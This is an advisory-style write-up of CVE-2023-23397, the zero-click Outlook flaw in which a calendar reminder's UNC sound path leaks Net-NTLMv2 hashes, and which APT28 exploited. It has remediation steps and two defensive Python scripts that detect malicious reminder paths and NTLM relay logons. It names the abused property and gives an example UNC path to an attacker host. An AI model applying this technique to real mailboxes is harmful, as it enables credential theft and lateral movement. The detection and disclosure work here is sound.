CVE-2023-23397 — Microsoft Office Outlook Privilege Escalation Vulnerability

Microsoft Outlook — Zero-Day NTLM Hash Theft via Malicious Calendar Reminder; No User Click Required; APT28 Exploited Since April 2022; March 2023 Patch Tuesday

What is Microsoft Outlook?

Microsoft Outlook is the world's most widely deployed enterprise email and calendar client, used by hundreds of millions of users across government, defense, financial, critical infrastructure, and commercial sectors. Outlook integrates deeply with Windows Active Directory and NTLM authentication, automatically processing calendar invitations, meeting reminders, and email attachments sent by other users. When Outlook processes these items — including at receipt/sync time, before the user opens anything — it can be triggered to make network connections. Any vulnerability that causes Outlook to send authenticated credentials to an attacker-controlled server on receipt of a crafted email or calendar item represents a zero-click credential theft capability of the highest severity.

Overview

CVE-2023-23397 is a critical zero-day privilege escalation vulnerability in Microsoft Outlook that enables an unauthenticated attacker to steal a victim's Net-NTLMv2 hash simply by sending a specially crafted email or calendar invitation containing a UNC path to an attacker-controlled server. When Outlook processes the item — which happens automatically in the background when email arrives, not requiring the user to open or preview the message — Outlook attempts to connect to the UNC path to retrieve the reminder sound, automatically sending the Windows Net-NTLMv2 credential hash for the victim's account. APT28 (Russian GRU) exploited this vulnerability as a zero-day from approximately April 2022 through the March 2023 patch — 11 months of undetected zero-day exploitation against European government, military, energy, and transportation targets.

Affected Versions

Product                                        Status
Microsoft Outlook 2013 (all editions)          Patched — March 2023 Patch Tuesday
Microsoft Outlook 2016 (all editions)          Patched — March 2023 Patch Tuesday
Microsoft Outlook 2019 (all editions)          Patched — March 2023 Patch Tuesday
Microsoft 365 Apps for Enterprise (Outlook)    Patched — March 2023 Patch Tuesday
Microsoft Outlook 2021                         Patched — March 2023 Patch Tuesday

Microsoft Outlook for Mac, iOS, and Android are not affected, and Exchange Online / Microsoft 365 web clients are not affected: only the Windows Outlook client processes the reminder-sound UNC path and makes the resulting SMB connection.

Technical Details

CWE-20 (Improper Input Validation). Outlook supports custom reminder sounds for calendar items — a feature that allows calendar invitations to specify a UNC path (e.g., \\attacker.com\share\sound.wav) as the reminder sound file. When Outlook processes a calendar invitation containing a PidLidReminderFileParameter property with a UNC path, Outlook automatically initiates a Windows SMB connection to that path to retrieve the sound file.

Windows NTLM authentication is performed automatically for SMB connections — the Windows system sends a Net-NTLMv2 authentication hash to the server at the target UNC path. An attacker operating an SMB server at the specified address receives this hash, which can then be:

  1. Cracked offline: Net-NTLMv2 hashes are crackable via dictionary or brute-force attacks, potentially revealing the plaintext Windows password.
  2. Used in NTLM relay attacks: The hash can be relayed immediately to authenticate to other services on the corporate network that accept NTLM authentication — enabling lateral movement without needing to crack the password.

The critical characteristic is the UI:N (No User Interaction) requirement: Outlook processes the calendar item automatically when email is delivered to the inbox, even if the user never opens the message. This makes CVE-2023-23397 a zero-click credential theft that works against any reachable Windows Outlook user.
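The property named above is also what the mailbox sweep in the Remediation section looks for. As an added example (not Microsoft's script and not from the advisory), the Python below triages PidLidReminderFileParameter values taken from exported calendar items: it separates ordinary local sound paths from UNC paths, extracts the host and share for blocking or IoC correlation, and flags every UNC host that is not on an allowlist. The Record and Finding types, the sample records, and the hostnames and addresses in them are constructed for this example.

```python
"""Triage PidLidReminderFileParameter values from exported calendar items.

Added example, not Microsoft's detection script. `Record` is a hypothetical
shape standing in for whatever a mailbox export produces; the sample
records at the bottom are constructed.
"""
import re
from dataclasses import dataclass

# MAPI named property carrying the reminder sound path
# (property set PSETID_Common, LID 0x851F); the value is a string.
REMINDER_FILE_PROPERTY = "PidLidReminderFileParameter"

# Matches \\host\share... and the forward-slash form //host/share...;
# group 1 is the host, group 2 the first path component (the share).
UNC_RE = re.compile(r"^(?:\\\\|//)([^\\/]+)[\\/]([^\\/]*)")


@dataclass
class Record:
    item_id: str
    sender: str
    props: dict          # property name -> value, as exported


@dataclass
class Finding:
    item_id: str
    sender: str
    host: str
    share: str
    raw: str


def classify_reminder_path(value):
    """Return 'absent', 'local', or 'unc' for a reminder-sound path value."""
    if not isinstance(value, str) or not value.strip():
        return "absent"
    m = UNC_RE.match(value.strip())
    if not m:
        return "local"
    # \\?\ and \\.\ are Win32 device-path prefixes, not network hosts
    # (the \\?\UNC\host\share long-path form is not unwrapped here).
    if m.group(1) in ("?", "."):
        return "local"
    return "unc"


def extract_unc(value):
    """Return (host, share) for a UNC path, or None if it is not one."""
    if classify_reminder_path(value) != "unc":
        return None
    m = UNC_RE.match(value.strip())
    return m.group(1).lower(), m.group(2)


def scan_records(records, trusted_hosts=()):
    """Return Findings for items whose reminder sound lives on a UNC host
    outside the trusted set. An empty trusted set flags every UNC path,
    which is the right default for this CVE: a reminder sound should not
    normally be fetched from a file server at all."""
    trusted = {h.lower() for h in trusted_hosts}
    findings = []
    for rec in records:
        unc = extract_unc(rec.props.get(REMINDER_FILE_PROPERTY))
        if unc is None:
            continue
        host, share = unc
        if host in trusted:
            continue
        findings.append(Finding(rec.item_id, rec.sender, host, share,
                                rec.props[REMINDER_FILE_PROPERTY]))
    return findings


# Constructed sample input: a benign local path, an external UNC path with
# an IP literal, a forward-slash variant, and an item without the property.
SAMPLE_RECORDS = [
    Record("item-001", "colleague@example.com",
           {REMINDER_FILE_PROPERTY: r"C:\Windows\Media\notify.wav"}),
    Record("item-002", "outside@example.net",
           {REMINDER_FILE_PROPERTY: r"\\203.0.113.10\share\s.wav"}),
    Record("item-003", "outside@example.org",
           {REMINDER_FILE_PROPERTY: "//files.example.org/snd/x.wav"}),
    Record("item-004", "colleague@example.com", {}),
]

if __name__ == "__main__":
    for f in scan_records(SAMPLE_RECORDS):
        print(f"{f.item_id} from {f.sender}: reminder sound on host "
              f"{f.host}, share {f.share} ({f.raw})")
```

The host values a sweep like this produces are the natural input to the outbound SMB block in the workaround: a list of external hosts that mailbox items have tried to authenticate to is exactly what the perimeter rule and the incident timeline need.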

Discovery

The Ukraine CERT (CERT-UA) identified APT28 exploitation of this vulnerability in early 2023 while investigating Russian cyberattacks against Ukrainian defense and government targets, and reported it to Microsoft. Microsoft's investigation revealed the zero-day had been exploited since approximately April 2022 — 11 months before the patch — in campaigns targeting organizations across Europe.

Exploitation Context

APT28 (Fancy Bear, STRONTIUM, Forest Blizzard) — the cyber arm of Russia's GRU military intelligence — used CVE-2023-23397 in a sustained campaign targeting:

  • European government ministries and defense departments
  • Military and defense-industrial organizations
  • Energy and critical infrastructure companies
  • Transportation sector entities

The attack methodology was simple and reliable: send a crafted calendar invitation to a target's email, then relay or crack the received Net-NTLMv2 hash for initial access. APT28's 11-month operational use before detection reflects both the stealth of the technique (no user interaction, no malicious attachment to detect) and the effectiveness of credential relay for lateral movement in Active Directory environments.

The same-day CISA KEV addition (March 14, 2023) reflects the extreme severity — zero-click credential theft from a ubiquitous email client with confirmed nation-state exploitation and an 11-month undetected zero-day window.

Remediation

  1. Apply the March 2023 Patch Tuesday updates for all versions of Microsoft Outlook on Windows immediately.
  2. As a temporary workaround if patching cannot be done immediately: add users to the Protected Users security group in Active Directory (prevents NTLM use for authentication) and block outbound SMB (port 445) at the network perimeter firewall.
  3. Run Microsoft's provided PowerShell script to identify and remove malicious PidLidReminderFileParameter properties from existing calendar items in Exchange mailboxes — the advisory includes the script.
  4. Review Exchange and email gateway logs for calendar items with UNC paths in reminder fields — particularly items sent from external senders between April 2022 and March 2023.
  5. Check for NTLM relay attack indicators in Active Directory logs: unexpected Kerberos or NTLM authentication events, particularly authentications from unusual source IPs or at unusual times.
  6. Consider disabling NTLM authentication entirely in favor of Kerberos for internal services — Net-NTLMv2 relay is a foundational technique in Active Directory lateral movement that extends beyond CVE-2023-23397.
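Step 5 above is a log-review task. As an added example, not from the advisory, the Python below applies two relay heuristics to constructed records shaped like a few fields of Windows Security event 4624: an NTLM network logon arriving from outside the address ranges clients normally use, and a logon whose WorkstationName (a value the client itself asserts in the NTLM authenticate message, so a relay host can forward the victim's) belongs to an inventoried machine but arrives from a different source address. The event shape, the inventory, and the address ranges are assumptions made for this example.

```python
"""Flag network logons carrying NTLM relay indicators.

Added example, not from the advisory. The events are constructed in the
shape of a few Windows Security event 4624 fields; the asset inventory and
trusted ranges are placeholders for an organisation's own data.
"""
import ipaddress
from dataclasses import dataclass, field


@dataclass
class LogonEvent:
    event_id: int
    logon_type: int        # 3 = network logon
    auth_package: str      # AuthenticationPackageName: NTLM or Kerberos
    user: str              # TargetUserName
    workstation: str       # WorkstationName, as asserted by the client
    source_ip: str         # IpAddress seen by the host that logged the event
    target_host: str       # host that recorded the event


@dataclass
class Alert:
    event: LogonEvent
    reasons: list = field(default_factory=list)


def ntlm_relay_indicators(events, inventory, trusted_networks):
    """inventory: workstation name (upper case) -> expected IP string.
    trusted_networks: CIDR strings that clients normally authenticate from.
    Only NTLM network logons (event 4624, logon type 3) are examined."""
    nets = [ipaddress.ip_network(n) for n in trusted_networks]
    alerts = []
    for ev in events:
        if (ev.event_id != 4624 or ev.logon_type != 3
                or ev.auth_package.upper() != "NTLM"):
            continue
        reasons = []
        try:
            src = ipaddress.ip_address(ev.source_ip)
        except ValueError:           # 4624 records "-" for some logons
            src = None
            reasons.append("unparseable source address")
        if src is not None and not any(src in n for n in nets):
            reasons.append("NTLM network logon from outside trusted ranges")
        expected = inventory.get(ev.workstation.upper())
        if expected and src is not None and src != ipaddress.ip_address(expected):
            reasons.append(f"workstation {ev.workstation} normally at "
                           f"{expected}, logon came from {ev.source_ip}")
        if reasons:
            alerts.append(Alert(ev, reasons))
    return alerts


# Constructed inventory and ranges (placeholders).
SAMPLE_INVENTORY = {"WS-ALICE": "10.0.0.21", "WS-BOB": "10.0.0.22"}
TRUSTED_NETWORKS = ["10.0.0.0/8"]

# Constructed events: Kerberos (ignored), a consistent NTLM logon, a logon
# claiming WS-ALICE from the wrong address, an external NTLM logon, and an
# interactive NTLM logon (ignored because it is not logon type 3).
SAMPLE_EVENTS = [
    LogonEvent(4624, 3, "Kerberos", "alice", "WS-ALICE", "10.0.0.21", "FS01"),
    LogonEvent(4624, 3, "NTLM", "alice", "WS-ALICE", "10.0.0.21", "FS01"),
    LogonEvent(4624, 3, "NTLM", "alice", "WS-ALICE", "10.0.0.99", "FS01"),
    LogonEvent(4624, 3, "NTLM", "bob", "RELAY-BOX", "198.51.100.7", "FS01"),
    LogonEvent(4624, 2, "NTLM", "bob", "WS-BOB", "10.0.0.22", "WS-BOB"),
]

if __name__ == "__main__":
    for a in ntlm_relay_indicators(SAMPLE_EVENTS, SAMPLE_INVENTORY, TRUSTED_NETWORKS):
        print(f"{a.event.user} on {a.event.target_host} from {a.event.source_ip}: "
              + "; ".join(a.reasons))
```

The workstation-mismatch rule is the more specific of the two: a relayed authentication reaches the target from the relay host's address while still carrying the original client's workstation name, so a name that inventory ties to one machine appearing from another address deserves a look even when the address is internal.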

Key Details

Property               Value
CVE ID                 CVE-2023-23397
Vendor / Product       Microsoft — Office
NVD Published          2023-03-14
NVD Last Modified      2025-10-27
CVSS 3.1 Score         9.8
CVSS 3.1 Vector        CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
Severity               CRITICAL
CWE                    CWE-20
CISA KEV Added         2023-03-14
CISA KEV Deadline      2023-04-04
Known Ransomware Use   No

CVSS 3.1 Breakdown

Attack Vector          Network
Attack Complexity      Low
Privileges Required    None
User Interaction       None
Scope                  Unchanged
Confidentiality        High
Integrity              High
Availability           High

Required Action

CISA BOD 22-01 Deadline: 2023-04-04. Apply updates per vendor instructions.

Timeline

Date         Event
2022-04-01   Earliest confirmed APT28 exploitation of CVE-2023-23397, used against European government, military, and energy targets for approximately 11 months before the patch
2023-03-14   Microsoft patches CVE-2023-23397 on March 2023 Patch Tuesday; CISA adds it to the KEV catalog the same day, reflecting zero-day severity
2023-04-04   CISA BOD 22-01 remediation deadline
2023-04-11   Microsoft and CERT-UA publish joint advisory detailing APT28 exploitation and affected sectors